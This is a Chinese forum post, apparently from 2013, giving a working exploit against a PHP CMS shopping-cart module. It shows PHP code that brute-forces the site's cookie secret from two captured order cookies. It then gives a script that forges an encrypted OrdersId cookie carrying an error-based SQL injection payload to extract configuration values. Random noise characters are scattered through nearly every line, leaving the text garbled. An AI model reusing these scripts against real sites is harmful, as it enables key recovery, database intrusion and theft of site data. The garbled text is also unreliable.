www.xxx.com/plus/search.php?keyword=
\# f; q( _- Y( A9 B1 I在 include/shopcar.class.php中0 r& `' {$ _# p4 F
先看一下这个shopcar类是如何生成cookie的4 J. F0 ~, u; x, R% T7 y- a. V' E
239 function saveCookie($key,$value)1 \+ T9 C! d& k6 i. f; J8 R2 \$ \
240 {" f4 n: l" H9 c; u" M
241 if(is_array($value))
\, M: d& O- i& N242 {# f$ m B) H9 \# P3 a- a7 w7 A
243 $value = $this->enCrypt($this->enCode($value));
) K8 r2 _$ n8 g# n* e244 }9 a ^ d/ M; `
245 else
) m/ d2 Y3 l N* \246 {' p. a: [0 }. _
247 $value = $this->enCrypt($value);
j/ q/ r- q0 D; k248 }
# ^. u# ]2 Q* P249 setcookie($key,$value,time()+36000,’/');- Y1 o0 E# v; X2 o4 |
250 }4 s) T1 D) l* Y1 I* F
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数) f8 Q0 r( ? s) E0 n
186 function enCrypt($txt)" w$ U" Q! m: c) t! `% g+ `: s
187 {+ H% }, L7 `# X: e( R
188 srand((double)microtime() * 1000000);7 a5 S; `4 X' Y
189 $encrypt_key = md5(rand(0, 32000));
9 s% Q b1 l7 x! @+ i( R190 $ctr = 0;
3 A" w, V! h9 i$ P' W191 $tmp = ”;
+ F7 U2 o9 c9 ~4 [0 ?" m- p3 }192 for($i = 0; $i < strlen($txt); $i++); I: Q8 y% t% a' b
193 {! `' f6 O/ w' v# m- U! f4 ]+ Z
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
; ]; D2 \1 L3 z- q1 m2 H$ O/ x. l195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);$ m8 o( F! ^8 K7 Z# f9 B$ j+ U$ Z
196 }9 Q; j1 H. r; z
197 return base64_encode($this->setKey($tmp));/ ^& Z4 s% j5 `
198 }3 [3 ]" a" [5 m: ?. e& @' M0 J( ^0 D
213 function setKey($txt)6 h3 T2 g$ _* _- l; D7 A
214 {
+ e8 E0 g/ {. j& A215 global $cfg_cookie_encode;! e. b. C) ^# o4 w! D- H$ z, n
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
7 ]& R( x4 t; ~* @# o1 |$ z2 N217 $ctr = 0;, |6 Z7 G- ]. R
218 $tmp = ”;1 G8 M" S! H- W4 d( {& j# @
219 for($i = 0; $i < strlen($txt); $i++)8 `7 C3 ^3 k( d! S
220 {7 \" E' p' E ~
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; \# r p8 ]5 {# B
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];. U* N' Q# X/ q! s Q, n
223 }6 d& `# S. l6 Y ~+ ~7 N
224 return $tmp;' R! q" ?- ~- b
225 }
" U( [# j, V' V; [, AenCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
@! p2 T( O2 D ^, c然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。! { a0 l% H8 p9 {) _) b1 o
具体代码如下:
' c7 g% R. `( j3 G% s: O6 w1 x<?php
+ {9 Q1 T% c! i$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
1 l: A$ P% p/ g+ S3 e; l$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
* U" i4 r8 O& v+ E$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
$ h3 ^5 z2 X( H: Mfunction reStrCode($code,$string), y+ _1 [) Z- L( |$ U7 A4 z9 l
{1 |* N& p( R }7 y% E# L0 y
$code = base64_decode($code);+ ]6 K+ T, X% ^# I! H0 D' S3 P
$key = “”;
4 P5 K \; M3 h4 T8 U# s& zfor($i=0 ; $i<32 ; $i++)4 R* R1 k- m; g* {* K
{
) \2 w2 ~6 {) _% \& Z6 w$key .= $string[$i] ^ $code[$i]; H, Y7 ?2 R4 i
}
' `' \7 m3 J) p8 T% K2 v6 dreturn $key;! b5 k6 L% }4 U6 Y# i. v
}) `% ?, [" q6 w, W3 `3 s7 X2 T0 C3 L
function getKeys($cookie,$plantxt)
. d$ _2 `2 U! M1 B& o+ U{4 K1 {! V5 \5 a
$tmp = $cookie;9 Z) T" \; J. A. M
$results = array();; e* z) @1 G; b* Z9 K J1 |. u
for($j=0 ; $j < 32000; $j++)
; m) B8 ? [! c5 t2 f{" U9 t; W6 T) y, ]& T
* ~9 v. g6 w$ V& r" l; O
$txt = $plantxt;% g0 m" M# N$ m
$ctr = 0;
0 x, Y( f* g: M" c7 R' s& @$tmp = ”;, b4 G6 G$ Y& o# v/ M& \& X
$encrypt_key = md5($j);
/ X' N6 h5 K C; n8 }5 z4 Z/ i3 {for($i =0; $i < strlen($txt); $i ++)
1 _5 x( x, H7 k( p( X{1 X3 N9 Z9 h( Z' z$ L1 Q
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; @5 y1 e5 v1 ^* P) {2 B
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);& ?( z6 e5 c& r8 X e- c) P
}
8 _7 t9 e- t1 h! [, W, c$string = $tmp;; I) ^! w6 ^+ H4 Y# h* O0 U
$code = $cookie;
* y2 N: r4 B+ S3 K; {. [6 x1 U8 w$result = reStrCode($code,$string);
- m6 N! J/ P: nif(eregi(‘^[a-z0-9]+$’,$result))6 W7 h g6 z' H# S. W5 N7 f: K
{
4 x+ n7 o0 A: Mecho $result.”\n”;0 e* k9 Q- w1 u
$results[] = $result;; L; o6 q4 g; Q+ E* H9 c
}
9 H' l6 {5 @" ?9 p4 H}
! f! W- Z) p6 O0 u1 c# F& r% M$ Ureturn $results;9 ~! N5 r& ^5 k. `5 W
}! j. \# [; r' S
$results1 = getKeys($cookie1,$plantxt);
! Y* Q8 u' J) W: S) H' ~$results2 = getKeys($cookie2,$plantxt);
$ w. O7 A' |; S; q6 Hprint “\n——————–real key————————–\n”;
( [8 v8 W9 t4 A! b2 L' Eforeach($results1 as $test1): R" z, m1 s) W
{
! d% ^% _9 g7 b7 _8 Mforeach($results2 as $test2)) s" Y, R" f' ~; t
{, V! ^8 G: a8 q* P( l9 `8 Q
if($test1 == $test2)
) h+ X2 w0 l4 R; K{
+ I: n" M8 |3 [& Recho $test1.”\n”;0 X; v; V* i9 t) e: c3 i+ F! U0 I
}. R( \( j6 z; M0 p' T
}
+ p% `# F: ^: L& }9 E. z}. w6 w' u0 ^; L% W4 j
?>
/ q$ n5 y7 ?7 A6 _cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
. d$ z( G% D0 h% N7 wplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua16 o+ `5 A" C: z4 ^
然后推算出md5(strtolower($cfg_cookie_encode))8 n0 Q% P6 b5 w# m9 }) Y5 |- t
得到这个key之后,我们就可以构造任意购物车的cookie0 c1 e4 ^0 t/ h3 O
接着看4 t F- a- [# {+ J) w1 f0 O
20 class MemberShops6 {9 v' ~4 L$ f! q
21 {# P- \+ B8 W3 A) p: w9 K- K
22 var $OrdersId;: v* [7 H' z, L
23 var $productsId;+ K4 H$ c6 e9 o5 p3 H2 M9 ] ]+ e
24
) F& B5 S5 m: M3 d! {) ?25 function __construct()
4 ~. C+ d a4 A- Z# }26 {2 g, S" e( i7 `. o9 R
27 $this->OrdersId = $this->getCookie(“OrdersId”);
% \' o( S& T. T& Z" X# G28 if(empty($this->OrdersId))
, M/ E3 i4 h8 x) D/ ]/ U' W29 {, f9 U& @; v1 o6 m
30 $this->OrdersId = $this->MakeOrders(); u+ ]2 ^+ ]* _ j3 b, C# Y
31 } e! P; W I; j8 l# Q1 |, L
32 }+ N+ g: Z/ B8 C* W
发现OrderId是从cookie里面获取的
}/ e: w) k5 u* f J然后
. R) @) [. H* W( r& `: S/plus/carbuyaction.php中的( O9 S' ?$ G4 C; g* H8 W
29 $cart = new MemberShops();/ F; @2 y6 _- \ m. V# G" g L& O9 W
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
u. X8 ~9 g' g……
8 ?5 ^4 z! z. f: p7 _9 W173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
+ G( n/ U- c% w* Z- E: l0 z) f9 Q) o接着我们就可以注入了. B! {2 V1 w$ W, h2 Q* g' q
通过利用下面代码生成cookie:/ f j" @+ N. r @" G+ ]
<?php
, y# Q( e+ q/ h c" `2 m$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
* q7 d& v' m6 I$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
$ N% L" V M* Y- s% m. C: ]function setKey($txt)0 o! I a8 f1 r0 O. |
{
: M( p: \. Z8 M! }! |+ i* sglobal $encrypt_key;6 G! @. E& i T: w7 m
$ctr = 0;4 t4 A- I$ V6 {$ J
$tmp = ”;
. ?, w2 e+ b4 @, q/ ^" lfor($i = 0; $i < strlen($txt); $i++)
4 ]% D+ q# W4 \( w# H{
2 x6 D" W3 R* i- N e5 Q! Y$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;% W% k3 x& Y5 k( H2 A N3 q; x
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];. I" v1 n( E4 \* G1 O
}% [( p7 H$ j! `3 y! n- w" s) I2 k
return $tmp;7 h; B7 U2 c4 l3 i
}
8 v; S8 ~/ |" `8 x" jfunction enCrypt($txt)
$ G- o% C9 W) J% c7 O{6 C' Z# |1 x6 D, Y! }
srand((double)microtime() * 1000000);
6 C" L! F$ n; @& ^$encrypt_key = md5(rand(0, 32000));; n0 \; T% W; o
$ctr = 0;6 H; e7 q P4 o1 Z f9 l1 z: R
$tmp = ”;
- q$ s$ _( K5 xfor($i = 0; $i < strlen($txt); $i++)
! I$ e& c' {* m3 [, G. e{
& g* y, u8 t! J) L0 j$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, s* ~0 a( M1 k2 T( \$ U0 y$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
- ~3 c. R6 F& e# y}
9 n5 v4 Z5 w7 X; _; N kreturn base64_encode(setKey($tmp));. U2 d; c& J4 w# _6 [
}! {8 X! O, C' f( p
for($dest =0;$dest = enCrypt($txt);)0 t; K/ W+ o& f# n
{, P B+ I, q4 n# k& H
if(!strpos($dest,’+'))$ r3 z" D; @3 k- Y% ~/ t3 K
{9 l) P) ]0 O. F2 L% g7 D; {
break;
! _" y5 A& d" e2 z5 G& y; P' q5 K3 m, l3 B}- Z0 K0 E- l) p8 R+ p
}, E! @7 L2 p V7 k. Z( q7 A
echo $dest.”\n”;- w) _6 }6 t2 h: U" r
?>9 E8 {! H# E* s0 Z& w9 E
/ K2 y% @2 p" {" z( t |
发表于 2013-2-13 23:58:29
收藏
支持
反对